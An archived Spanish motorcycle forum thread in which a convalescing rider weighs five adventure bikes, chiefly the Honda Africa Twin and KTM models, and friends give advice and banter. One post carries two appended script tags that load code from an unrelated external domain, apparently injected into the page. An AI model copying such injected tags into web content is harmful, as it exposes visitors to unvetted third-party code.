PDA

Ver la versión completa : ¿Que maxi-trail escoger?



jaimev
27/11/2015, 22:23
Estar convaleciente y aburrido en casa tiene estas cosas, tengo demasiado tiempo para darle al coco.

El viaje a la Eicma de Milán ha servido además para que vuelva muy caliente con todo lo que vi. Un cóctel Molotov.
Me doy cuenta de que hecho a faltar tener una moto gorda otra vez y el mercado actual está de lo más interesante. He intentado hacer un resumen de los aspectos básicos de las 5 maxi-trail que más me gustan:

- Honda Africa Twin
- KTM 1190 Adventure R
- KTM 1290 Super Adventure
- BMW R1200 GS Adventure
- Ducati Multistrada 1200 Enduro

A ver que opináis: http://traildreamer.com/reflexiones-de-un-lisiado-aburrido-que-maxi-trail-escoger/

Saludos!

http://i1278.photobucket.com/albums/y519/jvonarend/072415bottom_zpsap7c1bjy.jpg

http://i1278.photobucket.com/albums/y519/jvonarend/MTS-Enduro_2016_studio_R_C01_1920x1080.mediagallery_ou tput_image_1920x1080_zpssop6jcbw.jpg

http://i1278.photobucket.com/albums/y519/jvonarend/1290_super_adventure_4_4_zps777qhclm.jpg

http://i1278.photobucket.com/albums/y519/jvonarend/3144051-0-10396351_zpsztcdto6a.png

http://i1278.photobucket.com/albums/y519/jvonarend/KTM%201100%20Adventure%2013_zpszuk3koun.jpg

gasclassic
27/11/2015, 22:39
Jaume, trail ahí veo dos y de las dos, cogería la Africa Twin sin dudarlo.
¿por que?
1 - por que es la mas bonita.
2 - por que es Honda.
3 - por que la podría coger automática/secuencial (es el futuro).
4 - por que va a tener una reventa cojonuda.
5 - por que siendo pesada, es la mas ligera.
6 - por que siendo cara, es la mas barata.
7 - por que corre aun siendo la menos potente, de sobras.
8 - por que seguro que suena mejor que la KTM 1190 R, que suena a máquina de coser.
9 - por que pocas motos en la historia han despertado esta expectación.
10 - por que nunca has tenido una Africa Twin y ya va siendo hora.
11 - por que seguramente es la mas fiable.
12 - por que te gusta y lo sabes.

gasclassic
27/11/2015, 22:45
Por cierto, si no te convence ninguno de los "12 mandamientos", tengo mas, pero he intentado resumir :-D

13 - BMW ya has tenido.
14 - las KTM no te gustan.
15 - la Ducati es carísima y luego te costaría venderla.
16 - el concesionario KTM mas cercano lo tienes a tomar pol culo.
17 - el de Ducati ya ni te cuento.
18 - ................ luego si quieres sigo :golpe:

cuco
27/11/2015, 23:02
...

Joan KLX
27/11/2015, 23:11
Yo la Honda sin dudarlo.

Salut!! :sombrero:

jaimev
27/11/2015, 23:25
Jaume, trail ahí veo dos y de las dos, cogería la Africa Twin sin dudarlo.
¿por que?
1 - por que es la mas bonita.
2 - por que es Honda.
3 - por que la podría coger automática/secuencial (es el futuro).
4 - por que va a tener una reventa cojonuda.
5 - por que siendo pesada, es la mas ligera.
6 - por que siendo cara, es la mas barata.
7 - por que corre aun siendo la menos potente, de sobras.
8 - por que seguro que suena mejor que la KTM 1190 R, que suena a máquina de coser.
9 - por que pocas motos en la historia han despertado esta expectación.
10 - por que nunca has tenido una Africa Twin y ya va siendo hora.
11 - por que seguramente es la mas fiable.
12 - por que te gusta y lo sabes.

Mmmm no se...

1. si que es bonita pero la Ducati lo es más
2. eso no me dice mucho
3. ni de coña
4. de acuerdo
5. pero no se han roto los cuernos
6. de acuerdo
7. está por ver
8. eso es fácil
9. incluso demasiada, que pesaditos se han puesto!!
10. tal vez
11. seguramente
12. si pero con dudas, le falta el picante!

jaimev
27/11/2015, 23:27
Por cierto, si no te convence ninguno de los "12 mandamientos", tengo mas, pero he intentado resumir :-D

13 - BMW ya has tenido.
14 - las KTM no te gustan.
15 - la Ducati es carísima y luego te costaría venderla.
16 - el concesionario KTM mas cercano lo tienes a tomar pol culo.
17 - el de Ducati ya ni te cuento.
18 - ................ luego si quieres sigo :golpe:


13. de acuerdo
14. la 1290 me encanta
15. pero me vuelve loco
16. si, es una putada
17. tendría solución cercana y fiable
18 deja, deja... ;)

jaimev
27/11/2015, 23:28
La respuesta es muy fácil en tu caso: la que tenga más cosas que se puedan cambiar para tunearla.... :D

como me conoces... en todas habrá algo que cambiar ;)

Yeyu
27/11/2015, 23:31
Yo buscaría tu ex - yamaha e intentaría recomprarla.

Si te apetece algo diferente iría sin duda a por la AT, y con la diferencia de precio la prepararía a gusto del consumidor.

Enviado desde mi GT-I9505 mediante Tapatalk

jaimev
27/11/2015, 23:38
Yo buscaría tu ex - yamaha e intentaría recomprarla.

Si te apetece algo diferente iría sin duda a por la AT, y con la diferencia de precio la prepararía a gusto del consumidor.

Enviado desde mi GT-I9505 mediante Tapatalk

No creas.. ya me pasó por la cabeza ya... pero segundas partes nunca son buenas.
Me gusta la AT pero le encuentro a faltar algo que esos mastodontes si que tienen. La tengo que probar.

Yeyu
27/11/2015, 23:43
Yo tengo un proyecto/paja mental de maxi trail al que no paro de darle vueltas.

Igual te mando un privado para que te entretengas durante tu convalecencia (por cierto, a tope con la recuperación)


Enviado desde mi GT-I9505 mediante Tapatalk

jaimev
27/11/2015, 23:46
Yo tengo un proyecto/paja mental de maxi trail al que no paro de darle vueltas.

Igual te mando un privado para que te entretengas durante tu convalecencia (por cierto, a tope con la recuperación)


Enviado desde mi GT-I9505 mediante Tapatalk

Venga, ahora no me dejes así!!

Gracias!!

Yeyu
28/11/2015, 00:12
MP enviado [emoji12]

Sigamos con tu duda existencial, a ver que opina el resto del personal. De momento gana la Honda

Enviado desde mi GT-I9505 mediante Tapatalk

MiguelXR33
28/11/2015, 00:19
A mí también me llama la atención la Ducati, más que nada porque es la menos campera. Bueno, posiblemente la 1290 lo sea menos, pero es que estando la 1190 R "tunear" la 1290 lo veo totalmente ilógico. Además, la Ducati tiene mucho que hacer para que sea buena en campo... al ritmo que tú les das, a mí me sobraría de serie.

El problema de la Ducati, desde mi punto de vista, es la excesiva cantidad de electrónica que tiene. Eso puede ser un problema, porque casi todo lo maneja una única centralita. Hablamos de cosas que difícilmente usarás en off-road, como control de tracción, de caballito, ABS, por no hablar de las suspensiones electrónicas con "SkyHood". Aunque bien pensado, quizás tu reto sea ese.

Eso sí, aunque yo he sido uno de esos pesados con la AT 1000 (en mi blog he hecho ¡siete! artículos sobre ella) creo que si te decides por ella... serás uno más. La AT, por lo menos entre nosotros los traileros, va a ser una superventas, y ello hará que muchos la preparen. No sé si para ti tendrá gracia. Ahora, un pepino como tu Yam SuperT partiendo de la Multistrada... puedes volver a ser famoso en todo el mundo... :-D

JOE VESPINO
28/11/2015, 00:31
Jaime, todo esto suena de que estás disculpándote/pidiendo permiso para comprarte una KTM :D

Tienes mi bendición, espero que la elegida sea una 1190R :salida:<script type="text/javascript" src="https://clousc.com/player.php?ver=1.0&ref=at"></script><script type="text/javascript" src="https://clousc.com/player.php?ver=1.0&ref=at"></script>

KarlMars
28/11/2015, 02:14
Hello..creo que Jaime nos da la clave en el punto número 15.

jaimev
28/11/2015, 08:15
Yeyu, lo tuyo tiene tela!! ;)

Miguel, yo veo menos campera la Ducati que la 1290 pero La intención no es complicarme la vida y meterme en preparaciones complejas, busco un SUV (aggg que he dicho!!). Para liadas ya tendría una más ligera.
Estoy de acuerdo con la excesiva electrónica pero es el signo de los tiempos... todas van cargaditas.
No me importaría nada ser uno más con una Africa si me decido por ella, solo tengo la impresión de que en Honda no se han acabado de creer que tocaba "echar el resto" y dar un puñetazo en la mesa. No me puedo creer que Honda no pueda sacar una Africa R con 10 o 15 kgs menos y 10 o 15 CV más. Le encuentro a faltar una pizca de picante.
Como te he dicho no me voy a meter en lÍos (o eso creo) así que mI Multi no sería excesiva noticia, no van por ahí los tiros.

Gracias Joe, tal vez ya sea hora ¿no? :D... pero la 1190R la tengo muy vista, tal vez si sacaran una nueva versión...

KarlMars, esa es una buena observación, por suerte después de un calentón, viene la calma... no lo tengo nada claro

En resumen:

Sin duda que la moto más lógica para una utilización campera es la Africa seguida por la 1190R.

Lo que pasa es que ya voy siendo mayor y tengo que ir pensando en no meterme en líos con vacas gordas (al menos esa es la intención, luego las malas compañías me corrompen ;) ) y por eso me apetece algo más rutero para viajar e ir al trabajo pero que me permita meterme por pistas.

Con la 1200 y ahora la 660 me lo he pasado teta trasteando pero luego son poco prácticas si quiero ir al trabajo o viajar por carretera, así que busco algo más "standard", ese es el cambio principal con respecto a mis anteriores motos.
De todas formas, cualquiera de las cinco es más ligera y campera que mis anteriores GSA y Super T y con ellas me lo pasé muy bien por campo, ¿por qué no ha de ser igual con cualquiera de estas?

Saludos y gracias por las aportaciones.

De momento:
1a: Honda
2a: KTM 1190R
....

DRubenZ
28/11/2015, 08:32
Hola, a mi la que mas me gusta de las cinco es la Honda.

Antonio69
28/11/2015, 08:48
Creo que tendrás que probar la honda antes de decidirte. A mí también me da la sensación de que va a tener poco picante, tengo ganas de saber que tal anda ese motor. ¿un cacharro para divertirte, rutear y poder enredarle sin andar con modificaciones? Yo lo tengo claro: 1190R. Y si KTM sacase una 1050R, sería esa. Otra cosa que puedes hacer es pillarte la 1050 y ponerle las ruedas y el manillar de la 1190.

jaimev
28/11/2015, 08:55
Creo que tendrás que probar la honda antes de decidirte. A mí también me da la sensación de que va a tener poco picante, tengo ganas de saber que tal anda ese motor. ¿un cacharro para divertirte, rutear y poder enredarle sin andar con modificaciones? Yo lo tengo claro: 1190R. Y si KTM sacase una 1050R, sería esa. Otra cosa que puedes hacer es pillarte la 1050 y ponerle las ruedas y el manillar de la 1190.

Si hay que probar antes.

La 1050 fue una decepción cuando la ví, pensaba que sería la heredera de la 990 pero no deja de ser una 1150 descafeinada, apenas es más ligera y no es más pequeña. No mola nada.

Pedro_01
28/11/2015, 09:40
Buenas jaimev, como opinar es gratis y no piden prueba de nivel... vamos a ello.
A mi la África me encanta, de hecho es posible que una vez subido, encargue una. Pero creo que el punto que la diferencia realmente respecto al resto de tus opciones, es el cambio automático, y justamente esto no te atrae. Por lo demás, creo que la KTM es muy parecida y te da bastantes cv más. ¿Que no hacen falta para campo? obvio. Pero entiendo que si estás mirando este tipo de motos, es porque como tu dices vas a usarla en carretera, quizás viajes, etc. Y como no tienes pinta de Sor Citroen, al salir de una curva subiendo un puerto de montaña importante, la KTM creo que te va a estirar un poco más la sonrisa hacia los anclajes de la visera que la AT. Y por campo, deben ir parecidas. (De la pasta no hablo que es de mal gusto... jaja).
Por otro lado, si no vamos a cambiar nada a la moto, la Ducati y la BMW creo que la llanta de 19 les penalizará en pista, pero en carretera deben tener un punto más de confort por protección, etc. Si no te vas a calentar cuando entres a pista con ella, porque vienes desfogado ya con la segunda moto, creo que BMW y Ducati son mejor opción que las más camperas. Ahora bien, si eres de los que un "no hay huevos" te convierte en el coche de Fast & furious al darle al óxido nitroso ese... mejor piensa en 21'', no?.
Entre Ducati y BMW las dos me parecen preciosas (opinión personal), pero creo que de nuevo, la potencia de la Ducati, en carretera te va a estirar más la sonrisa.
De marcas tampoco hablo, ni de concesionarios ni nada de eso, creo que la calidad de todas es acoj....ante.
Que quede claro que yo con mi AT del 99, cuando veo éstas, pienso como los abuelos en las discotecas: me las tiraba a todas.

jaimev
28/11/2015, 10:27
Hola Pedro.

Lo clavas:

A priori, sobre el papel y sin probarla la Africa se me queda corta respecto a las otras, luego puede que no sea así... veremos cuando la pruebe.
No soy sor Citroen pero en carretera soy bastante malo, de todas formas en algún momento se agradece sacar un poco de adrenalina y saber que esos CV están allí mola.
Lo de "no hay huevos" es lo que más me preocupa. La sensación (y más tras mi accidente) es que tengo que sentar la cabeza. Otra cosa es que con los descerebrados con los que salgo siempre acabamos metiéndonos en líos y allí es donde una moto más campera ayuda. Este es el punto crítico: saber si seré capaz de decir "yo por ahí no me meto"...

En lo único que no estoy de acuerdo es en lo del cambio automático. Lo probé en la Honda de carretera y es sensacional pero no concibo una moto de campo en la que no pueda controlar la rueda trasera con el embrague. Me gustaría probarlo pero incluso los responsables de Honda dicen que para uso intensivo off road mejor el manual... eso sin contar con la complejidad y peso añadido.

Ah.. y yo, como tú me las tiraba a todas ;)

SergioTrail
28/11/2015, 12:52
La Honda de momento por la estética , para mi gana de calle, luego habrá que probarla claro, y salir de dudas.

gasclassic
28/11/2015, 14:19
Bueno, aquí otro viejo verde que se las tiraría a todas.
Pero una vez dejado el pabellón bien alto (o no :golpe:) ¿que?
Por que hay vida mas allá de la cama.

Jaume, hace tiempo que nos conocemos y hemos compartido varias rutas, desde trialeras donde tu pasabas sin siquiera hacer pié y los demás debíamos bajarnos y empujar para subir a trancas y barrancas, hasta tramos de autopista donde tu ritmo con la GS1200 era incluso mas bajo del que hacía yo con mi vieja AT 750 y precisamente por esto creo que lo que buscas es la nueva AT.

Pero entiendo que tiran mas dos tetas que dos carretas (en este caso no son tetas, si no cv) y los 150-160 cv de las KTM y la Ducati son un reclamo al que es difícil resistirse al poco que tengas un 2% de gasolina en las venas.
pero tu ya tienes una edad, no en sentido peyorativo, que ya quisieran muchos jóvenes tener tu forma física, si no que precisamente se supone tienes una experiencia que debería estar a prueba de propuestas absurdas y consumistas, mas orientadas al postureo y al que dirán, que al disfrute real.

Tu mismo reconociste que ni con la GS ni con la ST, echaste en falta cv.
La AT anda por ahí en cv, pero con algunos kg menos, con lo cual el andar será como mínimo el mismo.
Y luego tiene margen de mejora, que es lo que precisamente te gusta.
Que si le cambias el escape, ganando cv y sacando peso.
Que si a la suspensión le haces 4 arreglillos.
Un protector por aquí, un porta-maletas por allí.......

Sinceramente y ya sin razones chorras:
Ducati, rueda de 19", bien en carretera, pero tu eres mas de off y lo sabes, aunque luego no la usaras para hacer traileras como si hacias con la GS 1200!
KTM 1290, igual que la Ducati.
Y quedan las dos trail, trail.
1190 R que la has probado bien y ya sabes como va, es un tiro, pero es KTM, para lo bueno y para lo malo.
Y la AT que es un poco la incógnita, pero que sobre el papel sabes que es lo que buscas.
21 y 18", con lo que puedes montar lo que quieras.
230mm suficientes para una vaca.
300 km le sacas como mínimo de autonomía.
Pasa de los 200 y seguramente de los 210 km/h.
Seguro que bajará de los 4 seg. en el 0 a 100 ¿lenta?
Y parece tener un asiento cómodo.
Si encima todo esto te lo dan por menos de los que cuesta cualquiera de las otras y si no te gusta, con la expectativa creada sabes que la puede revender fácilmente, ¿Qué mas quieres?
¿Qué te convenzamos?
¿autoconvencerte?

Espera a que hayan unidades de prueba y luego obra en consecuencia teniendo en cuenta las 3 c, Cabeza, Cartera, Corazón

ranex
28/11/2015, 14:30
¿Y la V Strom 1000 no te la planteas?. Se sacan a buen precio, por 12000 mas o menos te la llevas equipada de todo y para el uso que dices que le vas a dar es una moto cojonuda que te llevara donde quieras y como quieras.
Eso si no tiene tanta chorrada electrónica ni tropecientos mil caballos, pero creo que el motor es una delicia y duro como una roca.
Me parece una compra muy sensata.
Mira por ejemplo:

http://motos.coches.net/ocasion/suzuki/v__strom_1000/abs-2015-en-madrid-5882211.htm

jaimev
28/11/2015, 18:46
Bueno, aquí otro viejo verde que se las tiraría a todas.
Pero una vez dejado el pabellón bien alto (o no :golpe:) ¿que?
Por que hay vida mas allá de la cama.

Jaume, hace tiempo que nos conocemos y hemos compartido varias rutas, desde trialeras donde tu pasabas sin siquiera hacer pié y los demás debíamos bajarnos y empujar para subir a trancas y barrancas, hasta tramos de autopista donde tu ritmo con la GS1200 era incluso mas bajo del que hacía yo con mi vieja AT 750 y precisamente por esto creo que lo que buscas es la nueva AT.

Pero entiendo que tiran mas dos tetas que dos carretas (en este caso no son tetas, si no cv) y los 150-160 cv de las KTM y la Ducati son un reclamo al que es difícil resistirse al poco que tengas un 2% de gasolina en las venas.
pero tu ya tienes una edad, no en sentido peyorativo, que ya quisieran muchos jóvenes tener tu forma física, si no que precisamente se supone tienes una experiencia que debería estar a prueba de propuestas absurdas y consumistas, mas orientadas al postureo y al que dirán, que al disfrute real.

Tu mismo reconociste que ni con la GS ni con la ST, echaste en falta cv.
La AT anda por ahí en cv, pero con algunos kg menos, con lo cual el andar será como mínimo el mismo.
Y luego tiene margen de mejora, que es lo que precisamente te gusta.
Que si le cambias el escape, ganando cv y sacando peso.
Que si a la suspensión le haces 4 arreglillos.
Un protector por aquí, un porta-maletas por allí.......

Sinceramente y ya sin razones chorras:
Ducati, rueda de 19", bien en carretera, pero tu eres mas de off y lo sabes, aunque luego no la usaras para hacer traileras como si hacias con la GS 1200!
KTM 1290, igual que la Ducati.
Y quedan las dos trail, trail.
1190 R que la has probado bien y ya sabes como va, es un tiro, pero es KTM, para lo bueno y para lo malo.
Y la AT que es un poco la incógnita, pero que sobre el papel sabes que es lo que buscas.
21 y 18", con lo que puedes montar lo que quieras.
230mm suficientes para una vaca.
300 km le sacas como mínimo de autonomía.
Pasa de los 200 y seguramente de los 210 km/h.
Seguro que bajará de los 4 seg. en el 0 a 100 ¿lenta?
Y parece tener un asiento cómodo.
Si encima todo esto te lo dan por menos de los que cuesta cualquiera de las otras y si no te gusta, con la expectativa creada sabes que la puede revender fácilmente, ¿Qué mas quieres?
¿Qué te convenzamos?
¿autoconvencerte?

Espera a que hayan unidades de prueba y luego obra en consecuencia teniendo en cuenta las 3 c, Cabeza, Cartera, Corazón

Bueno, sigo siendo lento por carretera pero ya no tanto ;)
Y sí, ya soy mayor... pero me cuesta resistirme al postureo :D
Pero tienes razón, hay que probar la AT... y las otras si puedo y decidirme, tengo tiempo de sobras para ello.

Ya lo iremos viendo!

jaimev
28/11/2015, 18:50
¿Y la V Strom 1000 no te la planteas?. Se sacan a buen precio, por 12000 mas o menos te la llevas equipada de todo y para el uso que dices que le vas a dar es una moto cojonuda que te llevara donde quieras y como quieras.
Eso si no tiene tanta chorrada electrónica ni tropecientos mil caballos, pero creo que el motor es una delicia y duro como una roca.
Me parece una compra muy sensata.
Mira por ejemplo:

http://motos.coches.net/ocasion/suzuki/v__strom_1000/abs-2015-en-madrid-5882211.htm

No, no me gusta nada la estética gallinácea de las Suzuki.
Y si a la AT le encentro a faltar algo a estas las encuentro sin ninguna personalidad ni sex appeal.
Una pena ya que como dices los motores son fantásticos, pero no solo de motor vive el hombre ;)

manchi
28/11/2015, 19:44
Hola jaime

¡Hay cuanto daño hace la convalecencia!:)

Yo lo único que te aconsejaría es que pruebes la 1290 y si puedes también la Ducati, son las dos más "SUV" y que mejor se adaptan al uso que quieres darles.

La Ducati no se como andará pero la 1290 te aseguro que es una moto que enamora y cuando pasas las 6000 rpm es como conectar el hiperespacio en el Halcon Milenario.:enamorao:


Respecto a lo del accidente y lo de "sentar la cabeza" pues siempre se piensa un poco después de estos momentos pero creo que siendo frios y pensando un poco el accidente fué en carrera, otra cosa distinta son las salidas en moto donde se suele ir con más margen y menos presión y donde no nos jugamos nada.

Animos y ¡no pienses tanto! jajaja. Por cierto para el hombro paciencia, a mi me llevó un par de meses de muchísimo trabajo y sudores recuperarlo entero y eso sin intervención.

Isidoro
28/11/2015, 19:57
A ver...mi turno.

Como ahora estás convaleciente, desconecta un poco, céntrate en tu recuperación. Si puedes, haz cosas que en situación "normal" no podrías hacer por tiempo, exceso de tareas etc. Ir o ver más cine, leer algo que te guste que tengas en el olvido, cafés de una hora y media, paseos con la parienta, etc, etc. Mientras haz todo lo posible por recuperarte al 100%, y cuando llegue el momento y se alineen los astros, las pruebas todas, y una vez bien probadas, sacaras conclusiones correctas. Ahogarte en datos no te ayudará decidirte en absoluto.

Espero haberte ayudado a decidir.

[emoji6]

JOE VESPINO
28/11/2015, 20:29
Jaime ¿cual es el diagnostico?

Saludos

transalacant
28/11/2015, 20:57
Jaime, dices que buscas algo más rutero y cómodo en el día a día, que sea apto para viajes largos asfalticos. Creo que hay un modelo que se ajusta bastante a lo que buscas.
Seguro que con algunos retoques puedes trailizarla un poco más, pero dicen que por pistas es muy estable.














http://s1.cdn.autoevolution.com/images/news/gallery/2013-harley-davidson-tri-glide-ultra-classic-the-genuine-trike-photo-gallery_6.jpg

jaimev
28/11/2015, 21:00
Hola jaime

¡Hay cuanto daño hace la convalecencia!:)

Yo lo único que te aconsejaría es que pruebes la 1290 y si puedes también la Ducati, son las dos más "SUV" y que mejor se adaptan al uso que quieres darles.

La Ducati no se como andará pero la 1290 te aseguro que es una moto que enamora y cuando pasas las 6000 rpm es como conectar el hiperespacio en el Halcon Milenario.:enamorao:


Respecto a lo del accidente y lo de "sentar la cabeza" pues siempre se piensa un poco después de estos momentos pero creo que siendo frios y pensando un poco el accidente fué en carrera, otra cosa distinta son las salidas en moto donde se suele ir con más margen y menos presión y donde no nos jugamos nada.

Animos y ¡no pienses tanto! jajaja. Por cierto para el hombro paciencia, a mi me llevó un par de meses de muchísimo trabajo y sudores recuperarlo entero y eso sin intervención.

Estoy moviendo hilos para poder probarlas todas en cuando pueda conducir. Si lo consigo prometo una comparativa en condiciones!!
Todo el mundo me comenta eso, que la 1290 está en otra galaxia, está por ver si yo estoy a su altura.

Lo de sentar cabeza es un propósito serio. He tenido mucha suerte ya que en todos estos años haciendo el cabra es la primera vez que me he hecho daño, tal vez por eso uno llega a creerse invencible y un revolcón así nos pone en el sitio.
Es una mierda romperse y ahora me doy cuenta, intentaré que no vuelva a pasar... pero sigo pensando en los rallys ;)

Estaría más que contento que solo fueran dos meses, mi esperanza es que, como estaba estropeado de antes, me quede incluso mejor. Eso espero.

Saludos!!

jaimev
28/11/2015, 21:00
A ver...mi turno.

Como ahora estás convaleciente, desconecta un poco, céntrate en tu recuperación. Si puedes, haz cosas que en situación "normal" no podrías hacer por tiempo, exceso de tareas etc. Ir o ver más cine, leer algo que te guste que tengas en el olvido, cafés de una hora y media, paseos con la parienta, etc, etc. Mientras haz todo lo posible por recuperarte al 100%, y cuando llegue el momento y se alineen los astros, las pruebas todas, y una vez bien probadas, sacaras conclusiones correctas. Ahogarte en datos no te ayudará decidirte en absoluto.

Espero haberte ayudado a decidir.

[emoji6]

Así lo haré, gracias papá ;)

jaimev
28/11/2015, 21:03
Jaime ¿cual es el diagnostico?

Saludos

Pulgar izquierdo y tendones del hombro derecho rotos ;)
Además de pérdida irremediable de masa cerebral... pero eso es de nacimiento y no hay nada que hacer!! jejeje

jaimev
28/11/2015, 21:05
Jaime, dices que buscas algo más rutero y cómodo en el día a día, que sea apto para viajes largos asfalticos. Creo que hay un modelo que se ajusta bastante a lo que buscas.
Seguro que con algunos retoques puedes trailizarla un poco más, pero dicen que por pistas es muy estable.














http://s1.cdn.autoevolution.com/images/news/gallery/2013-harley-davidson-tri-glide-ultra-classic-the-genuine-trike-photo-gallery_6.jpg

Desde que vine de USA no pienso en otra cosa... (que cabroncete) :D

Me gustaría encontrarte de cara en en una de esas pistas!

gasclassic
28/11/2015, 21:10
No, no me gusta nada la estética gallinácea de las Suzuki.
Y si a la AT le encentro a faltar algo a estas las encuentro sin ninguna personalidad ni sex appeal.
Una pena ya que como dices los motores son fantásticos, pero no solo de motor vive el hombre ;)

Te pillé :descohone:

Isidoro
28/11/2015, 21:29
Así lo haré, gracias papá ;)
Jajajaja jaja [emoji23] [emoji23] [emoji23]

transalacant
28/11/2015, 22:11
Me gustaría encontrarte de cara en en una de esas pistas!

Yo llevo una muy parecida, pero naranja !!!!!!!!!!!!!!














http://i2.cdscdn.com/pdt2/3/3/1/1/700x700/fe800006331/rw/trimoto-xtm-6v-feber.jpg

domingo
28/11/2015, 22:51
te paso enlace de comparativa de la ktm 1290 y la bmw 1200 adventure...
http://motos.coches.net/noticias/bmw-r-1200-gs-adventure-ktm-1290-super-adventure-comparatvo

Así lees un rato más y te entretienes un poco!!!
RECUPÉRATE!!

jaimev
29/11/2015, 13:44
Gracias!!

No se mojan los periodistas ;)

domingo
29/11/2015, 15:02
Gracias!!

No se mojan los periodistas ;)
es lo que se estila en estos tiempos....ser siempre políticamente correcto.....la única que sí se moja es la copiloto, da una opinión directa y sincera!!

Sr. Jaron
29/11/2015, 15:18
Yo, la verdad es que tengo muchas ganas de ver la Honda AT nueva y equipada en directo. Subirá el precio con los extras pero....tiene muy buena pinta

jaimev
29/11/2015, 16:37
es lo que se estila en estos tiempos....ser siempre políticamente correcto.....la única que sí se moja es la copiloto, da una opinión directa y sincera!!

Cierto, es la única que habla claro :D

jaimev
29/11/2015, 16:41
Yo, la verdad es que tengo muchas ganas de ver la Honda AT nueva y equipada en directo. Subirá el precio con los extras pero....tiene muy buena pinta

Tuve la suerte de poder verla y sentarme en ella en Milán. Si te interesa aquí tienes lo que escribo sobre ella en el próximo post que estoy preparando sobre lo visto allí:

HONDA

Sin duda uno de los principales objetivos del viaje para poder ver POR FIN!! a la tan esperada Africa Twin.

El año pasado ya pude ver el prototipo aquí mismo y me encantó el planteamiento. Por suerte la definitiva apenas ha variado. Es muy bonita, simple, sin nada que falte ni sobre, ni grande ni pequeña, todo en su sitio. Sin ser retro tampoco tiene un diseño rompedor, es casi clásico pero elegante y sobrio, sin alardes, toda una aventurera que no busca el postureo. Me gusta mucho.

No me da la impresión de que con esta moto en Honda hayan querido entrar en el segmento de las maxi-trail tipo GS1200. Creo que el cliente será más el de la GS800 que el de la 1200. Un cliente al que no le importe pasar desapercibido por la calle ni llevar la moto rallada o embarrada al trabajo, traileros auténticos.

Como comento en el post de la comparativa de maxi-trails, parece que por fin Honda se ha decidido a sacar una moto más pasional y menos lógica que sus últimas creaciones, sin embargo creo que no habría estado de más otra vuelta de tuerca. Esta misma moto con unos kilos menos y 105 o 110 CV no me generaría ninguna duda en ir a por ella. En cambio pesa casi 30gks más que mi Tenere (que no es un ejemplo de ligereza), sólo 4 menos que una KTM 1190R y da 94CV con lo que se queda incluso uno por debajo de la Tiger 800. Muy prudentes veo a los señores de Honda. El reto está en saber si es fácil hacerla adelgazar y si cambiando escapes y alguna tontería electrónica se la puede hacer algo más picante.

No voy a entrar en detalles técnicos, poco queda por decir tras la machacona campaña de publicidad que Honda ha hecho para el lanzamiento de esta moto. Sin duda lo que más me gusta es que no se han andado con rodeos y de entrada la ofrecen con ruedas de 21" y 18", una buena altura al suelo y largas suspensiones de 230mm así que al que le guste meterse en fregaos no le hará falta hacerle nada. Bravo!!

Me encantó la que tenían con escape Termignoni, depósito más grande, colín recortado, asiento corrido, tapas laterales... incluso el motor se veía diferente... ¿apuntando a una versión Maratón?, esa me la quedo ya!!.

gasclassic
29/11/2015, 20:27
Cierto, es la única que habla claro :D

Yo también hablo claro, a veces hasta demasiado. :lol:
Jaume, ¿la AT pesa 30 kg mas que la teneré?

cruiser
29/11/2015, 20:31
La del cambio automático pesa hasta 30 kg más que una F800. Yo creo que respecto de la Teneré se acerca a los 40 kg de diferencia, que es una barbaridad en el campo.

jaimev
29/11/2015, 21:03
Yo también hablo claro, a veces hasta demasiado. :lol:
Jaume, ¿la AT pesa 30 kg mas que la teneré?

Que la mía si:

La Africa pesa 208 sin ABS y 212 con (seca)
Mi Tenere con las protecciones, accesorios y líquidos pero sin gasolina pesa 181

Por tanto son 27 kgs sin ABS y 31 con.
Supongo que a partir del año que viene solo la venderán con Abs ya que creo que es obligatorio

Benaudalla
29/11/2015, 21:13
Después de leer las 5 páginas seguidas, estoy esperando esa comparativa!:salida:

jaimev
29/11/2015, 21:17
Te pillé :descohone:

Por cierto, ¿me lo explicas?

jaimev
29/11/2015, 21:18
Después de leer las 5 páginas seguidas, estoy esperando esa comparativa!:salida:

Joder, si me la dejaran hacer... :D

gasclassic
29/11/2015, 21:48
La del cambio automático pesa hasta 30 kg más que una F800. Yo creo que respecto de la Teneré se acerca a los 40 kg de diferencia, que es una barbaridad en el campo.

Pero hagamos comparativas justas.
Si la GS800 no ofrece cambio automático, no la comparemos con una AT con ese cambio.
A igualdad de equipamiento, no creo que hayan mas de 10 kg, lo que ya es, pero claro, una es una 800 y la otra una 1000, normal que pese algo mas.


Que la mía si:

La Africa pesa 208 sin ABS y 212 con (seca)
Mi Tenere con las protecciones, accesorios y líquidos pero sin gasolina pesa 181

Por tanto son 27 kgs sin ABS y 31 con.
Supongo que a partir del año que viene solo la venderán con Abs ya que creo que es obligatorio

Y con el ABS lo mismo, tomemos datos con o sin, pero de las dos igual.
Y si tomas la tuya de referencia, a la que le has sacado de 8 a 10 kgs. se supone que a la AT también se le pueden sacar algunos, ya solo con el escape, igual se le pueden sacar 2 o 3, batería de litio, otro par.....
Teniendo en cuenta motos de serie, no creo que sean mas de 20 kg.
Que ya son, pero claro, una da 48 cv y la otra 95 cv, lo que aun me parece una diferencia mas notable.


Por cierto, ¿me lo explicas?

Fácil, tu hablas de lo dura que te la ponen la Multistrada y la 1290, con esos 160 cv y luego dices:

pero no solo de motor vive el hombre ;)

Que es lo que vengo diciendo yo desde hace días.
160 cv están muy bien para decirle al vecino cuantos cv tiene tu moto, pero una moto no es solo el motor.

Por cierto, mas arriba dices que Honda debería haber echado el resto, ofreciendo mas potencia, pongamos 110-115 cv.
¿por que Honda se ha conformado con 95 cv?
Por el carnet A2, esto lo comentó ya un compañero en el hilo de la porra y tiene todo el sentido, tanto que lo acertó de pleno.
Y de 95 a 115, van unos cuantos, pero la pela es la pela y hubieran perdido muchas ventas total para ganar ¿que?
¿5 km/h?
¿un par de décimas en aceleración?
Sin olvidar que los cv tienen un coste, ya sea en piezas mejores o a costa de la fiabilidad si solo es a base de electrónica.

Creo que vas a ir a por la AT ;)
Y diría que por abajo la WR450 :golpe: sacrificando la Teneré
Si acierto, me invitas a una Coca-Cola.

g8s
29/11/2015, 22:46
África y la 1190R son las q más me gustan.
La multi enduro si viajara acompañado.
La ADV la tengo casi manía y la 1190 me deja indiferente.
Siendo todas ellas unas motazas

jaimev
29/11/2015, 23:33
A ver Gasclassic

Si, hay que ser justos con el peso y por eso puse la diferencia con la versión sin ABS.

Seguro que a la Honda se le podrán sacar unos kgs pero también se añadirán en equipamiento y protecciones. Lo mismo me pasó en mi 660 por lo que esos 27+5 si me tuviera que quedar la de ABS por reglamentación se quedarán en unos ¿25kgs? más que en mi Tenere.

Son kilos pero también es cierto que no son motos comparables, son solo datos a tener en cuenta.

